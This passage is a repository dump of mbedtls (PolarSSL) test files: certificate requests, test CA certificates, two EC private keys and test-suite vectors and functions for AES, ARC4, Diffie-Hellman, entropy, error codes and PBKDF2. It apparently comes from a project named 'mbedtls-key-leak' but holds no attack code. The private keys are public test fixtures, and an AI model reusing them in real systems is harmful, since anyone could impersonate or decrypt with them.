AWoDgYEA2n8SOoiJCs+YyH2VXoUVxhutdXGP4+7cECakl2mmVEKhxXDMEG7hEFkB 9 | mkk4b1kRNOQHKqUq3crfi0OkMcPGkPiLlYLKgT51CgsBhuJaMsdCYo/5POgTZD4u 10 | FI5gfyO70Xpq9QmrWEqqTdalRG7+UmGa3VEUVyXTDnQZfU1N2QE= 11 | -----END CERTIFICATE REQUEST----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9.req.sha224: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBzTCCAQYCAQAwNDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRIw 3 | EAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN0R 4 | ip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7CuxNA24oSjokTJKXF9frY9ZDX 5 | yMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsIi2OZOgol7kXSGFi6uZMa7dRY 6 | mmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCVAgMBAAGgKTAnBgkqhkiG9w0B 7 | CQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgXgMD0GCSqGSIb3DQEBCjAwoA0w 8 | CwYJYIZIAWUDBAIEoRowGAYJKoZIhvcNAQEIMAsGCWCGSAFlAwQCBKIDAgFiA4GB 9 | AMlYYZKqpDqg5UZZq3NB3QUR9qftY/52/0gPfruw5s2gNtFmG1uyEBJX/oc7C/fU 10 | lxo74HDraWJyvP7c3MMhOuwr/RfPNQhA2Hgwz9RuJIBhQrJfiZuHsCfiKVofMuMf 11 | ar/4EKfyoELDdilhg6i+abahGOkqyXsjavFtyDSeCpXH 12 | -----END CERTIFICATE REQUEST----- 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9.req.sha256: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBzTCCAQYCAQAwNDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRIw 3 | EAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN0R 4 | ip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7CuxNA24oSjokTJKXF9frY9ZDX 5 | yMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsIi2OZOgol7kXSGFi6uZMa7dRY 6 | mmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCVAgMBAAGgKTAnBgkqhkiG9w0B 7 | CQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgXgMD0GCSqGSIb3DQEBCjAwoA0w 8 | CwYJYIZIAWUDBAIBoRowGAYJKoZIhvcNAQEIMAsGCWCGSAFlAwQCAaIDAgFeA4GB 9 | ACUaCTidvzWVJNKmRrriufThGUfw5Xgdsc3Ga8Cx+vRf+bPZmR3NVkc0Zq9uc0+8 10 | d1WXaLzbmge6IbcvTPWCLNDAWI9UzoQ6WS9myM3eDEGdruClYwb5BVLx3MvhvooK 11 | L/H6snE1dHNPXyCNVFTJIll3bRlVMRsfZpDhmz8/ImJ4 12 | -----END CERTIFICATE REQUEST----- 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9.req.sha384: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBzTCCAQYCAQAwNDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRIw 3 | EAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN0R 4 | ip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7CuxNA24oSjokTJKXF9frY9ZDX 5 | yMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsIi2OZOgol7kXSGFi6uZMa7dRY 6 | mmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCVAgMBAAGgKTAnBgkqhkiG9w0B 7 | CQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgXgMD0GCSqGSIb3DQEBCjAwoA0w 8 | CwYJYIZIAWUDBAICoRowGAYJKoZIhvcNAQEIMAsGCWCGSAFlAwQCAqIDAgFOA4GB 9 | ANfZGK6nE/CP9PuALFzbA/mvOnYlI60pMowscRfCYpvR25iQJVhAJfYVXADRN3qd 10 | NAiFWNVcjFMIkRlq7qifBN97VHGeYoWIuw9gYEb3OqDGzOsYP0KIgMNt8/A4qCkj 11 | 5MzolOYyT+N+QFGV0pdCNpX7QppfNdFyFAmWXa171RzG 12 | -----END CERTIFICATE REQUEST----- 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9.req.sha512: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBzTCCAQYCAQAwNDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRIw 3 | EAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN0R 4 | ip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7CuxNA24oSjokTJKXF9frY9ZDX 5 | yMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsIi2OZOgol7kXSGFi6uZMa7dRY 6 | mmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCVAgMBAAGgKTAnBgkqhkiG9w0B 7 | CQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgXgMD0GCSqGSIb3DQEBCjAwoA0w 8 | CwYJYIZIAWUDBAIDoRowGAYJKoZIhvcNAQEIMAsGCWCGSAFlAwQCA6IDAgE+A4GB 9 | ACxWBhPkhyVlBY/mwkrW7OjYsaN2/ZlFSv76w63b61BpigReJsggMut5EPOgfGYJ 10 | rzygKDlF/NtmMN22jWrFup9LsZJAX0gYbLmliiaG9Hch+i/8b42oaQTDWGFZ9LiY 11 | W7F7X0f9lpzNKOtQ8ix0s+nYS2ONyzfu55+Rlzf8/63M 12 | -----END CERTIFICATE REQUEST----- 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/test-ca-v1.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDIzCCAgsCDFOito4FQA5VXJOV5TANBgkqhkiG9w0BAQsFADBQMRwwGgYDVQQD 3 | ExNQb2xhclNTTCBUZXN0IENBIHYxMRAwDgYDVQQLEwd0ZXN0aW5nMREwDwYDVQQK 4 | EwhQb2xhclNTTDELMAkGA1UEBhMCTkwwIhgPMjAxNDA2MTkxMDA4MTRaGA8yMDI0 5 | MDYxODEwMDgxNFowUDEcMBoGA1UEAxMTUG9sYXJTU0wgVGVzdCBDQSB2MTEQMA4G 6 | A1UECxMHdGVzdGluZzERMA8GA1UEChMIUG9sYXJTU0wxCzAJBgNVBAYTAk5MMIIB 7 | IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwN83/Be74JadP4beljJ9RKUW 8 | oM0h8ZnU7OrLfBhYCJSl7JvFi98aHpk4mYcee8CNOd84XXB4B9Oe2ZPouXJRxc6j 9 | MFKp8udAcBTLRKJyC8LlQPk+5aYOs/nsSmPAuCkAdJxXO6ilBJBx8b2D2T/WpeI8 10 | Ko/vJ2DDxp/LuuxgfbfmhDK+T/tYJiIDW9S01fv145YucMDkLr38Lu7iQVXANC59 11 | JHJpy0exFECDfWf0hvYxq/F5pLK1LhL5hBfwYm8nPhNYsVQNIZpzN6Ewz2+S3Pbp 12 | /KzbLijRfgJLI6AV8jhlZAnqDG6OGxegccizm8mr6cPyz4eWj4ACMp6ZWG+i1QID 13 | AQABMA0GCSqGSIb3DQEBCwUAA4IBAQBoXC5AlXI5azyOPvmNse2qHhO7BrXOEjH+ 14 | 9g5P/VsrVADhsUGv6x0A2oLoWXtOjGDIWWH53BWHkCUCu4T5D5C6+I47rXWl4pAr 15 | J+h+tQVZo6J0AJxfPse/NnrjsboUSWhunmo/iTrU6S4KJBguIKP6T1DZoD/8EYgU 16 | x+fXDmvRO+MTesWDiY+p+FHEzsu3b9EBtG9dUiR/zzXi/ktFCfrgstKGSuW6+j7m 17 | lcduTxsogi6Uc3tWKtn6qpSGR0uBoCz6emFO7Smmy/tIyVA88lH0+3UnxOvu4TAK 18 | uvjYkOcZqhprDiMfhxBB7pxbfiviEANTbgSfCtZewSNz2RUJ9ocy 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/test-ca2.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICUjCCAdegAwIBAgIJAMFD4n5iQ8zoMAoGCCqGSM49BAMCMD4xCzAJBgNVBAYT 3 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 4 | QyBDQTAeFw0xMzA5MjQxNTQ5NDhaFw0yMzA5MjIxNTQ5NDhaMD4xCzAJBgNVBAYT 5 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 6 | QyBDQTB2MBAGByqGSM49AgEGBSuBBAAiA2IABMPaKzRBN1gvh1b+/Im6KUNLTuBu 7 | ww5XUzM5WNRStJGVOQsj318XJGJI/BqVKc4sLYfCiFKAr9ZqqyHduNMcbli4yuiy 8 | aY7zQa0pw7RfdadHb9UZKVVpmlM7ILRmFmAzHqOBoDCBnTAdBgNVHQ4EFgQUnW0g 9 | JEkBPyvLeLUZvH4kydv7NnwwbgYDVR0jBGcwZYAUnW0gJEkBPyvLeLUZvH4kydv7 10 | NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UE 11 | AxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAwGA1UdEwQFMAMBAf8w 12 | CgYIKoZIzj0EAwIDaQAwZgIxAMO0YnNWKJUAfXgSJtJxexn4ipg+kv4znuR50v56 13 | t4d0PCu412mUC6Nnd7izvtE2MgIxAP1nnJQjZ8BWukszFQDG48wxCCyci9qpdSMv 14 | uCjn8pwUOkABXK8Mss90fzCfCEOtIA== 15 | -----END CERTIFICATE----- 16 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/test-ca2.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIGkAgEBBDCD2RUOoHHwVxAzozi4hsGmEV1ttAPhKXZF14dvI6tEIOpke4WxdueF 3 | lap01tGkXuqgBwYFK4EEACKhZANiAATD2is0QTdYL4dW/vyJuilDS07gbsMOV1Mz 4 | OVjUUrSRlTkLI99fFyRiSPwalSnOLC2HwohSgK/Waqsh3bjTHG5YuMrosmmO80Gt 5 | KcO0X3WnR2/VGSlVaZpTOyC0ZhZgMx4= 6 | -----END EC PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/test-ca2.ku-crl.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIBzDCCAVOgAwIBAgIJAP6mZLzh0IPSMAoGCCqGSM49BAMCMD4xCzAJBgNVBAYT 3 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 4 | QyBDQTAeFw0xNDA0MDkxMTIzMzhaFw0yNDA0MDYxMTIzMzhaMD4xCzAJBgNVBAYT 5 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 6 | QyBDQTB2MBAGByqGSM49AgEGBSuBBAAiA2IABMPaKzRBN1gvh1b+/Im6KUNLTuBu 7 | ww5XUzM5WNRStJGVOQsj318XJGJI/BqVKc4sLYfCiFKAr9ZqqyHduNMcbli4yuiy 8 | aY7zQa0pw7RfdadHb9UZKVVpmlM7ILRmFmAzHqMdMBswDAYDVR0TBAUwAwEB/zAL 9 | BgNVHQ8EBAMCAQIwCgYIKoZIzj0EAwIDZwAwZAIwZOCKY0EHXYzI4cQsFnfOrxm1 10 | ufvNeZ4ZcSZWrkTBazW2OBCuCP9SLznec3SFOUvvAjAKe/qycfxkHivjieCEG1Kt 11 | m2D4QKSJELUhTHr4zdkeqbzgui0y3iouaoyWsKvetNg= 12 | -----END CERTIFICATE----- 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/test-ca2.ku-crt.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIBzTCCAVOgAwIBAgIJAODh6PAeD9/vMAoGCCqGSM49BAMCMD4xCzAJBgNVBAYT 3 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 4 | QyBDQTAeFw0xNDA0MDkxMTIzNTRaFw0yNDA0MDYxMTIzNTRaMD4xCzAJBgNVBAYT 5 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 6 | QyBDQTB2MBAGByqGSM49AgEGBSuBBAAiA2IABMPaKzRBN1gvh1b+/Im6KUNLTuBu 7 | ww5XUzM5WNRStJGVOQsj318XJGJI/BqVKc4sLYfCiFKAr9ZqqyHduNMcbli4yuiy 8 | aY7zQa0pw7RfdadHb9UZKVVpmlM7ILRmFmAzHqMdMBswDAYDVR0TBAUwAwEB/zAL 9 | BgNVHQ8EBAMCAgQwCgYIKoZIzj0EAwIDaAAwZQIwGGlbynd1jU3WkUx6Irhk9Lob 10 | z2B+1eIO6+eu3En8B3rh8Ipfxo0e0hpfaRFYP1MUAjEAjxxBchRWJAzZ6/47Wg/7 11 | UoasRINgP5B/uJhTnftS1bqyuWHastb4LW5/YLOvPbMQ 12 | -----END CERTIFICATE----- 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/test-ca2.ku-crt_crl.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIBzDCCAVOgAwIBAgIJAPejOupCJS65MAoGCCqGSM49BAMCMD4xCzAJBgNVBAYT 3 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 4 | QyBDQTAeFw0xNDA0MDkxMTIyMjVaFw0yNDA0MDYxMTIyMjVaMD4xCzAJBgNVBAYT 5 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 6 | QyBDQTB2MBAGByqGSM49AgEGBSuBBAAiA2IABMPaKzRBN1gvh1b+/Im6KUNLTuBu 7 | ww5XUzM5WNRStJGVOQsj318XJGJI/BqVKc4sLYfCiFKAr9ZqqyHduNMcbli4yuiy 8 | aY7zQa0pw7RfdadHb9UZKVVpmlM7ILRmFmAzHqMdMBswDAYDVR0TBAUwAwEB/zAL 9 | BgNVHQ8EBAMCAQYwCgYIKoZIzj0EAwIDZwAwZAIwMKLVXB4YBQ0Ha4dEvFPcJtau 10 | TS5Vd4UqG3xQ10YcJogweuqaGHSFgdnEUfoX+4p5AjApMnYXFfUjSmlyfJmTaswO 11 | gaR5sUnnw33NA9j1ercem3asCYz6a8T0zo8/rR33XVU= 12 | -----END CERTIFICATE----- 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/test-ca2.ku-ds.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIBzDCCAVOgAwIBAgIJAPOkPR3wsvm5MAoGCCqGSM49BAMCMD4xCzAJBgNVBAYT 3 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 4 | QyBDQTAeFw0xNDA0MDkxMTI0MTNaFw0yNDA0MDYxMTI0MTNaMD4xCzAJBgNVBAYT 5 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 6 | QyBDQTB2MBAGByqGSM49AgEGBSuBBAAiA2IABMPaKzRBN1gvh1b+/Im6KUNLTuBu 7 | ww5XUzM5WNRStJGVOQsj318XJGJI/BqVKc4sLYfCiFKAr9ZqqyHduNMcbli4yuiy 8 | aY7zQa0pw7RfdadHb9UZKVVpmlM7ILRmFmAzHqMdMBswDAYDVR0TBAUwAwEB/zAL 9 | BgNVHQ8EBAMCB4AwCgYIKoZIzj0EAwIDZwAwZAIwGRCmU/rWNjW13g8ITuq3pMXb 10 | jgwTFJHVlbMDiFJwUrRvytPV9doJOfzJ8nAQ0cZ1AjAbJ8QAV2e+DmYZpWc/p6Ug 11 | nQdac59ev+lH+ju6wET3jNDjUthUPrdgqa54+UWQ5r4= 12 | -----END CERTIFICATE----- 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/test-int-ca2.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIC6TCCAdGgAwIBAgIBDzANBgkqhkiG9w0BAQsFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTMwOTI0MTYwODQyWhcNMjMwOTIyMTYwODQyWjBLMQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxKTAnBgNVBAMTIFBvbGFyU1NMIFRlc3QgSW50ZXJtZWRp 6 | YXRlIEVDIENBMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE8Oih3fX5SLeN1dmFncQl 7 | WMw9+Y6sXblhlrXBxhXxjwdwpCHENn+foUVdrqYVYa7Suv3QVeO6nJ19H3QNixW8 8 | ik1P+hxsbaq8bta78vAyHmC4EmXQLg1w7oxb9Q82qX1Yo4GVMIGSMB0GA1UdDgQW 9 | BBQPib1jQevLXhco/2gwPcGI0JxYOTBjBgNVHSMEXDBagBS0WuSls97SUva51aaV 10 | D+s+vMf9/6E/pD0wOzELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRkw 11 | FwYDVQQDExBQb2xhclNTTCBUZXN0IENBggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZI 12 | hvcNAQELBQADggEBAAjeaTUaCBiXT1CYLVr6UFSeRNZBrDPnj6PwqUQTvgB5I5n6 13 | yXqoE4RYDaEL0Lg24juFxI26itBuypto6vscgGq77cfrP/avSdxU+xeZ4bCWvh3M 14 | ddj9lmko2U8I8GhBcHpSuIiTvgKDB8eKkjeq3AsLGchHDvip8pB3IhcNfL7W94Zf 15 | 7/lH9VQiE3/px7amD32cidoPvWLA9U3f1FsPmJESUz0wwNfINpDjmPr8dGbkCN+M 16 | CFhxo6sCfK8KLYG4nYX8FwxVR86kpSrO9e84AX0YYbdzxprbc2XOaebJ8+BDmzut 17 | ARkD7DTXrodN1wV7jQJkrUuEwPj9Rhvk+MFRkaw= 18 | -----END CERTIFICATE----- 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/test-int-ca2.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIGkAgEBBDAtxOHUV4be1MdH1frBHzxITCyUSxrVjJN8QTvTVk558ka0a3zhd4Pb 3 | ekWt7wBPXQegBwYFK4EEACKhZANiAATw6KHd9flIt43V2YWdxCVYzD35jqxduWGW 4 | tcHGFfGPB3CkIcQ2f5+hRV2uphVhrtK6/dBV47qcnX0fdA2LFbyKTU/6HGxtqrxu 5 | 1rvy8DIeYLgSZdAuDXDujFv1DzapfVg= 6 | -----END EC PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_aes.rest.data: -------------------------------------------------------------------------------- 1 | AES-ECB Encrypt (Invalid keylength) 2 | aes_encrypt_ecb:"000000000000000000000000000000":"f34481ec3cc627bacd5dc3fb08f273e6":"0336763e966d92595a567cc9ce537f5e":POLARSSL_ERR_AES_INVALID_KEY_LENGTH 3 | 4 | AES-ECB Decrypt (Invalid keylength) 5 | aes_decrypt_ecb:"000000000000000000000000000000":"f34481ec3cc627bacd5dc3fb08f273e6":"0336763e966d92595a567cc9ce537f5e":POLARSSL_ERR_AES_INVALID_KEY_LENGTH 6 | 7 | AES-256-CBC Encrypt (Invalid input length) 8 | aes_encrypt_cbc:"0000000000000000000000000000000000000000000000000000000000000000":"00000000000000000000000000000000":"ffffffffffffffe000000000000000":"":POLARSSL_ERR_AES_INVALID_INPUT_LENGTH 9 | 10 | AES-256-CBC Decrypt (Invalid input length) 11 | aes_decrypt_cbc:"0000000000000000000000000000000000000000000000000000000000000000":"00000000000000000000000000000000":"623a52fcea5d443e48d9181ab32c74":"":POLARSSL_ERR_AES_INVALID_INPUT_LENGTH 12 | 13 | AES Selftest 14 | depends_on:POLARSSL_SELF_TEST 15 | aes_selftest: 16 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_arc4.function: -------------------------------------------------------------------------------- 1 | /* BEGIN_HEADER */ 2 | #include 3 | /* END_HEADER */ 4 | 5 | /* BEGIN_DEPENDENCIES 6 | * depends_on:POLARSSL_ARC4_C 7 | * END_DEPENDENCIES 8 | */ 9 | 10 | /* BEGIN_CASE */ 11 | void arc4_crypt( char *hex_src_string, char *hex_key_string, 12 | char *hex_dst_string ) 13 | { 14 | unsigned char src_str[1000]; 15 | unsigned char key_str[1000]; 16 | unsigned char dst_str[1000]; 17 | unsigned char dst_hexstr[2000]; 18 | int src_len, key_len; 19 | arc4_context ctx; 20 | 21 | memset(src_str, 0x00, 1000); 22 | memset(key_str, 0x00, 1000); 23 | memset(dst_str, 0x00, 1000); 24 | memset(dst_hexstr, 0x00, 2000); 25 | arc4_init( &ctx ); 26 | 27 | src_len = unhexify( src_str, hex_src_string ); 28 | key_len = unhexify( key_str, hex_key_string ); 29 | 30 | arc4_setup(&ctx, key_str, key_len); 31 | TEST_ASSERT( arc4_crypt(&ctx, src_len, src_str, dst_str ) == 0 ); 32 | hexify( dst_hexstr, dst_str, src_len ); 33 | 34 | TEST_ASSERT( strcmp( (char *) dst_hexstr, hex_dst_string ) == 0 ); 35 | 36 | exit: 37 | arc4_free( &ctx ); 38 | } 39 | /* END_CASE */ 40 | 41 | /* BEGIN_CASE depends_on:POLARSSL_SELF_TEST */ 42 | void arc4_selftest() 43 | { 44 | TEST_ASSERT( arc4_self_test( 0 ) == 0 ); 45 | } 46 | /* END_CASE */ 47 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_dhm.data: -------------------------------------------------------------------------------- 1 | Diffie-Hellman full exchange #1 2 | dhm_do_dhm:10:"23":10:"5" 3 | 4 | Diffie-Hellman full exchange #2 5 | dhm_do_dhm:10:"93450983094850938450983409623":10:"9345098304850938450983409622" 6 | 7 | Diffie-Hellman full exchange #3 8 | dhm_do_dhm:10:"93450983094850938450983409623982317398171298719873918739182739712938719287391879381271":10:"9345098309485093845098340962223981329819812792137312973297123912791271" 9 | 10 | Diffie-Hallman load parameters from file 11 | dhm_file:"data_files/dhparams.pem":"9e35f430443a09904f3a39a979797d070df53378e79c2438bef4e761f3c714553328589b041c809be1d6c6b5f1fc9f47d3a25443188253a992a56818b37ba9de5a40d362e56eff0be5417474c125c199272c8fe41dea733df6f662c92ae76556e755d10c64e6a50968f67fc6ea73d0dca8569be2ba204e23580d8bca2f4975b3":"02":128 12 | 13 | Diffie-Hellman selftest 14 | dhm_selftest: 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_entropy.data: -------------------------------------------------------------------------------- 1 | Entropy write/update seed file 2 | entropy_seed_file:"data_files/entropy_seed":0 3 | 4 | Entropy write/update seed file 5 | entropy_seed_file:"no_such_dir/file":POLARSSL_ERR_ENTROPY_FILE_IO_ERROR 6 | 7 | Entropy too many sources 8 | entropy_too_many_sources: 9 | 10 | Entropy output length #1 11 | entropy_func_len:0:0 12 | 13 | Entropy output length #2 14 | entropy_func_len:1:0 15 | 16 | Entropy output length #3 17 | entropy_func_len:2:0 18 | 19 | Entropy output length #4 20 | entropy_func_len:31:0 21 | 22 | Entropy output length #5 23 | entropy_func_len:65:POLARSSL_ERR_ENTROPY_SOURCE_FAILED 24 | 25 | Entropy failing source 26 | entropy_source_fail:"data_files/entropy_seed" 27 | 28 | Entropy threshold #1 29 | entropy_threshold:16:2:8 30 | 31 | Entropy threshold #2 32 | entropy_threshold:32:1:32 33 | 34 | Entropy thershold #3 35 | entropy_threshold:16:0:POLARSSL_ERR_ENTROPY_SOURCE_FAILED 36 | 37 | Entropy thershold #4 38 | entropy_threshold:1024:1:POLARSSL_ERR_ENTROPY_SOURCE_FAILED 39 | 40 | Entropy self test 41 | entropy_selftest: 42 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_error.data: -------------------------------------------------------------------------------- 1 | Single low error 2 | depends_on:POLARSSL_AES_C 3 | error_strerror:-0x0020:"AES - Invalid key length" 4 | 5 | Single high error 6 | depends_on:POLARSSL_RSA_C 7 | error_strerror:-0x4080:"RSA - Bad input parameters to function" 8 | 9 | Low and high error 10 | depends_on:POLARSSL_AES_C:POLARSSL_RSA_C 11 | error_strerror:-0x40A0:"RSA - Bad input parameters to function \: AES - Invalid key length" 12 | 13 | Non existing high error 14 | error_strerror:-0x8880:"UNKNOWN ERROR CODE (8880)" 15 | 16 | Non existing low error 17 | error_strerror:-0x007F:"UNKNOWN ERROR CODE (007F)" 18 | 19 | Non existing low and high error 20 | error_strerror:-0x88FF:"UNKNOWN ERROR CODE (8880) \: UNKNOWN ERROR CODE (007F)" 21 | 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_error.function: -------------------------------------------------------------------------------- 1 | /* BEGIN_HEADER */ 2 | #include 3 | /* END_HEADER */ 4 | 5 | /* BEGIN_DEPENDENCIES 6 | * depends_on:POLARSSL_ERROR_C 7 | * END_DEPENDENCIES 8 | */ 9 | 10 | /* BEGIN_CASE */ 11 | void error_strerror( int code, char *result_str ) 12 | { 13 | char buf[500]; 14 | 15 | memset( buf, 0, sizeof( buf ) ); 16 | 17 | polarssl_strerror( code, buf, 500 ); 18 | 19 | TEST_ASSERT( strcmp( buf, result_str ) == 0 ); 20 | 21 | #if defined(POLARSSL_ERROR_STRERROR_BC) 22 | memset( buf, 0, sizeof( buf ) ); 23 | 24 | error_strerror( code, buf, 500 ); 25 | 26 | TEST_ASSERT( strcmp( buf, result_str ) == 0 ); 27 | #endif 28 | } 29 | /* END_CASE */ 30 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_memory_buffer_alloc.data: -------------------------------------------------------------------------------- 1 | Memory buffer alloc self test 2 | memory_buffer_alloc_self_test: 3 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_memory_buffer_alloc.function: -------------------------------------------------------------------------------- 1 | /* BEGIN_HEADER */ 2 | #include 3 | #define TEST_SUITE_MEMORY_BUFFER_ALLOC 4 | /* END_HEADER */ 5 | 6 | /* BEGIN_DEPENDENCIES 7 | * depends_on:POLARSSL_MEMORY_BUFFER_ALLOC_C 8 | * END_DEPENDENCIES 9 | */ 10 | 11 | /* BEGIN_CASE depends_on:POLARSSL_SELF_TEST */ 12 | void memory_buffer_alloc_self_test( ) 13 | { 14 | TEST_ASSERT( memory_buffer_alloc_self_test( 0 ) == 0 ); 15 | } 16 | /* END_CASE */ 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_pbkdf2.data: -------------------------------------------------------------------------------- 1 | PBKDF2 RFC 6070 Test Vector #1 (SHA1) 2 | depends_on:POLARSSL_SHA1_C 3 | pbkdf2_hmac:POLARSSL_MD_SHA1:"70617373776f7264":"73616c74":1:20:"0c60c80f961f0e71f3a9b524af6012062fe037a6" 4 | 5 | PBKDF2 RFC 6070 Test Vector #2 (SHA1) 6 | depends_on:POLARSSL_SHA1_C 7 | pbkdf2_hmac:POLARSSL_MD_SHA1:"70617373776f7264":"73616c74":2:20:"ea6c014dc72d6f8ccd1ed92ace1d41f0d8de8957" 8 | 9 | PBKDF2 RFC 6070 Test Vector #3 (SHA1) 10 | depends_on:POLARSSL_SHA1_C 11 | pbkdf2_hmac:POLARSSL_MD_SHA1:"70617373776f7264":"73616c74":4096:20:"4b007901b765489abead49d926f721d065a429c1" 12 | 13 | PBKDF2 RFC 6070 Test Vector #5 (SHA1) 14 | depends_on:POLARSSL_SHA1_C 15 | pbkdf2_hmac:POLARSSL_MD_SHA1:"70617373776f726450415353574f524470617373776f7264":"73616c7453414c5473616c7453414c5473616c7453414c5473616c7453414c5473616c74":4096:25:"3d2eec4fe41c849b80c8d83662c0e44a8b291a964cf2f07038" 16 | 17 | PBKDF2 RFC 6070 Test Vector #6 (SHA1) 18 | depends_on:POLARSSL_SHA1_C 19 | pbkdf2_hmac:POLARSSL_MD_SHA1:"7061737300776f7264":"7361006c74":4096:16:"56fa6aa75548099dcc37d7f03425e0c3" 20 | -------------------------------------------------------------------------------- 